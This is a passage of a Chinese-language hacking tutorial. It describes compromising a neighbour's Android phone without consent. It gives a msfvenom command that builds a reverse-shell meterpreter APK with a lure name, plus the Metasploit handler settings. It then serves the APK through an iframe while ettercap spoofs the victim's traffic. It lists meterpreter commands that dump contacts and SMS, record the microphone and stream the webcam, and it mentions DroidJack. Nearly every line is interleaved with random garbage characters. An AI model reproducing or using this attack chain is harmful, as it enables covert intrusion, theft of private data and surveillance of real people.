|
8 S0 ], o \( i! \; H 五、msf+ettercap入侵邻居安卓手机
9 H& s; j6 I1 U& o. y( G! \ 7 B' Z- y- i- r7 w: X# \' T! x
) `' ^! H0 T4 G3 G6 I6 P S* } 首先启动msf ; {- q, |, T5 O' V
; b# F6 |: J2 Z. x8 D6 n3 x# \/ o8 n, R
先用kali生成一个安卓木马,如下命令: : H9 U! Q3 \& c* K7 b
% r" Z5 G5 Z8 ^
) b- j6 s3 Z5 {0 `7 z; o
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk " A- w9 o @' P. e
. R1 [3 o: g: z( o0 p, F, n3 G
( d9 \6 M: G! o) L/ |) W- U
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
: c8 K f9 s7 I' [
& B& n* u% M* x8 E1 ?- d, m4 y% L; ?0 G* R! h5 @3 _
然后进入msf , T+ m( E& x) j4 o9 [$ k- l
7 D% M" m2 R' X- [, X# b
( K* F8 o k! E# W! P, g/ t f( D use exploit/multi/handler + Q. u9 S l( Z* P
# `1 H" _2 R$ A( ~$ G1 \" F2 E. S7 Z* X
set payload android/meterpreter/reverse_tcp
0 M( M# Y+ ~5 E. s: J1 ?( m5 ~7 T 9 y! H4 R" y+ [4 ]) U' |3 o- T
6 y8 ]4 E6 S; Q A& t" [ set LHOST 192.168.0.109 //ip为kaili的ip 5 C. X7 P* q0 }. F" p' W1 J1 e% f
7 @2 d, Q* t% h4 G
$ O* y6 w0 k% v7 ` set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : D# q. P8 x* o: i; @
* l: l" R+ d" q: w( s" C
( y; d6 i( i+ r C0 @0 A8 y Exploit
& @- B) y: R- u) ^ l( b
" Q! k. ~* i5 e. I4 [% @5 O+ n) c
: M# J6 |+ c# n8 |. ] 7 V7 @- g6 l* B8 P' x
( w8 J) r, d8 B; i% m 下面我们开启ettercap -G ; P( j1 T% F* }! c* J
# s7 G2 n& X/ r8 z, g
* p! x3 _8 l* M 我物理IP为
1 y* a) o: C1 ` 9 L5 e8 |& @) T- s6 S4 F& i/ M: H
/ B0 }1 ]0 i- W8 }% M+ m5 A/ U
]( I5 w/ t) q2 \9 L/ _
; a- G2 X: B8 j% |* x1 _( |
* |. S; y& `4 x" h, z3 L 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 3 q# H( w4 D. c; i3 N) Y4 S$ G
. H* {. G `# f6 R& k& m1 S0 ^7 v7 `5 Z
下面我们来设置一下
! n0 d% }8 g' z& `* r
! b1 R! X$ B8 r+ f5 ] w1 B0 Q
6 _; s2 B! d3 p- ]6 Y / F+ a& @1 Q' N
% {4 l1 z( T/ L- n; ? a* \4 [% }: x: T
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 9 s' p; x! d+ A
5 i- M' a# T; h/ S
2 }, Z/ \, }/ O * {4 X+ T& o6 s% I- {$ V# H
" ^, B+ r& Z( D K. ^' h2 ]2 L$ V+ Z% _
2 ^# S' W9 {4 ^. R4 e! l5 {
' S$ z0 k- e# v, c, C0 {& w
4 j; r7 _% s. W3 D( K, A3 r
$ X5 |! x e" g$ K x A$ D3 [6 b * K9 V9 A0 B+ U- v# _/ O4 ~
0 _. ]4 h! f) i6 O* ]4 {- ~
1 m6 p3 j& g4 T7 ~/ j
" ]; S. B. g% N& x! @( q" |: z
! P: L1 B' c3 |) @" ]* C8 I) y 1 k5 l' n! i0 F
; s9 x o$ Q2 f& \3 l: s1 r
+ a4 r$ M* H& Q/ q / ?0 e: a) F! L7 ~3 t
' P/ ^ L) U8 C% Y
8 a/ S6 c4 p/ }
+ Y2 I3 I, k$ D6 J+ h" r$ ] % v2 h9 c% H* R! A
8 W9 v+ ?: f7 c6 o# M
# w4 q8 j8 j$ R! G# ^* P/ M
$ b* ?! k5 M/ ]: t/ \9 l7 U& ~
& C7 c- P( r' X0 V T
6 ?0 p8 |# s; Y' h( |
8 d- b( ?5 o2 Q& r6 a6 A4 T) f! j 4 r; _2 X; n y7 w7 A7 \7 @
0 f# j W* s# G5 e( n+ C% i" F3 D8 n, L( b- Q8 F
% |1 d& p7 t7 y4 [) ?
4 H/ k2 e; T' ]) c ?. {$ c" F6 W
2 b/ y5 P% X# N! B1 y : z+ y H5 x7 N
8 t! j8 I9 F: W- V6 V' w. B2 C' s
( R9 c) \ R& a1 C0 Y# G
! Z/ w% Z9 h4 f$ C / q% ^. s/ N. v; J3 P- v
$ V% b2 [+ H$ T% @! Y$ k4 \ 下面我们开始攻击 $ ]' K5 [; m& m% ~
' \8 O! I P; h+ P( Z
9 e* y* h9 J0 [6 y! | ) I$ s/ G2 L& o9 h$ T
* \, Y" x- i' `6 ]# n
4 {$ _5 K! k0 M) @
6 @' K5 O3 X) L( d1 t$ `6 y
+ c1 L3 T. A* A e
1 b$ k8 \) D( T0 ?7 @ * _- w* E2 W/ [. l' q# ?2 J
; q0 h- t( r/ v) i& U! q. }
: T: N9 m1 b5 a3 K8 \3 a& l5 I0 U " _* S% Z b9 ^* _
1 v( M. y6 u1 ]
# N4 | r" [9 U8 W: }* B
7 n0 ^1 t8 {6 r4 N2 a. I
! z! v; G8 z# [! Z" h. E o" F1 k* t% X
大概过了5分钟多,发现反弹成功了 6 C1 m) C; E" ^) Y7 t ~+ P& c
0 F3 J' F8 I& I/ |3 E$ A
" s" ^3 u/ E6 N( V3 e* J* z
( R- z$ a0 _! A; V: C5 K * [6 N, K1 ?2 p, R! p
8 y- i7 l- D: c; q* j9 ]
: t& T6 w# H: A- ]6 ?! ]1 H
6 Z3 n1 I# V0 p! c3 N
4 L8 B. ^+ w2 Z* C& e 6 i$ q+ M2 n4 |7 a0 f7 S- F
' h# X. t4 G8 S5 c
, ^$ M7 N2 u- w; A0 r) p
+ b. Y7 @# R9 K6 w- n: [* r
1 [- b3 m. b4 u% m5 @/ m4 I
* Q& N) g+ t4 {/ v ~: i* E4 N- l6 C# R- H G
: ?4 B" J+ T. }" O0 g1 W% u, _
* | f; D" Z L8 a( V4 T% d$ [
& I5 t' T8 @' ?6 e$ a ( f! o5 j" x/ k, {( S. H, X2 ?
: S% T$ H! }" C% i/ A 7 ^# @& `% y/ d
" Y0 u5 ~. h" p. }: x" S, W) w* K; l7 Z
执行命令
! s+ H L/ t' @) v2 j
$ a, C- S9 e4 i: L0 S) p+ L
: S; i$ j2 J+ c) [
4 ]2 J3 E9 E; a$ ~ " V, ?$ y t" _3 ?
* Q" R7 |! b& r% C1 C* X3 @
dump_contacts --》这个是导出电话 ; V, b! l8 l; |, R, t
4 a; z& i- U$ x. ^4 L7 S5 ~) X+ ?0 _
dump_sms --》这个是导出信息
( I' f A! Z$ j! E! {7 _
8 s" D- a. }7 N# S7 a+ O3 ]; a( a" q( `8 f& ^4 `/ I% B6 e
record_mic Record audio from the default microphone for X seconds
6 Q5 X$ j. ?& C; |4 b! S
( v; T: E* V. n6 V* O3 D- L+ Z+ I
6 U" c# V" m- Y. r5 `( { webcam_chat Start a video chat
* F4 K9 I4 ~* n7 q
! v- v& P2 h4 a# S, q$ }
7 Z' p. p# b/ T& C) }. D( `0 X: K webcam_list List webcams , e" n) P/ Q @4 ^0 d( s
1 X# R0 y+ K% Y! X
n; {( c5 z$ P+ N! F: M
webcam_snap Take a snapshot from the specified webcam
# z( u7 S( A/ R7 E9 x
: |& }! c2 u" q4 N- w, L" l* @, R) ]) {
webcam_stream   lay a video stream from the specified webcam
+ V0 d; e' m2 x# x/ h+ C
: n9 O/ M5 }# o* K+ o/ K/ W! C" A2 v' o
0 ^* [! |. g: o6 V2 V6 N
- L* j$ R4 \+ O6 o+ V0 |" P' V1 H# p7 b1 f6 K
% T8 A! W1 H& y+ d
" G' h, r; Y, k9 |' A3 h
& c9 z1 H- I. ]0 | 我们打开看一下电话薄, 4 p% l, _$ x8 ?, o) M+ [3 K: g
x" r3 t0 V3 k+ C+ x
# K2 M: u3 S8 ^- P 2 Y' f% \: D% [
( w# L- ^( L9 f
6 q% `- S) S) f, U
4 ^3 _8 A3 S" i0 d$ n" r
$ Q3 ?6 u5 R" o4 j- J1 x; {+ p" q* e4 z& L. W
& c' L4 B2 {& `+ h, j2 ]' S - |9 ]2 P; T" J# j, u ^/ `3 r
7 z% l! P1 c6 n% g ~
+ a) E o q- u( X
9 ?5 Z! N- X4 a' d
* K$ e% }) X( q
1 z8 e f" M) h ' K" B3 j" ?3 H2 ^( A
+ j0 j1 ^9 p) u7 h6 S- @1 z9 ]) b
6 O2 ~2 O r. H: t
1 T) }2 P# H& _- n
7 I( K& `- ~$ @8 m+ R% }0 ? 我们同时欺骗成DroidJack木马,使用方法如图: # G* a9 T$ F; W5 J: m4 f
8 L' g# \2 s- J3 B: o& k# d2 d0 t. g7 a2 ^! t7 ]) F& n$ [8 ^
. C( m3 l' B" x2 F
! |3 h: y' V4 Y' {% n' i
1 Y, @! v8 Y* D Z( [9 }/ Y/ d! S& v
$ X; Q7 r" {( c6 f1 V: [1 y! s
5 L, C0 \6 u5 m4 J- P& i
% h% h+ P) t4 S7 b" B. j& ^
" x" V" P) z( E; ~" A; B1 B3 ^, {
* p, u. h- z0 N8 o/ \: Y. Z9 b8 g& e# t& V' \
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ; b% T- P+ M# q
' E9 f" r+ p4 T+ f7 H8 S) }
% F) {- e+ m) w `5 x% ?0 ?
. o+ f H2 }2 y
7 q( S9 Y; v; v! d6 S O0 x' q' C. |4 u d4 h) n
& A5 l4 W3 F7 b& A% c& S
" V1 j& l9 q2 a6 R
8 q, [4 N4 ]- u, p/ m5 ^, n" ?. X
" h0 r0 p8 i1 P1 I. {& e
: X7 G/ S) S1 q, T. [% p0 ]3 g

; F: p5 t' `7 w+ m' x" D( L 4 l! M! G+ W, w0 z9 c+ ]
9 f" ]2 {* l, b x- M2 a3 `+ E $ J2 o e( T! [2 Y3 R! V
|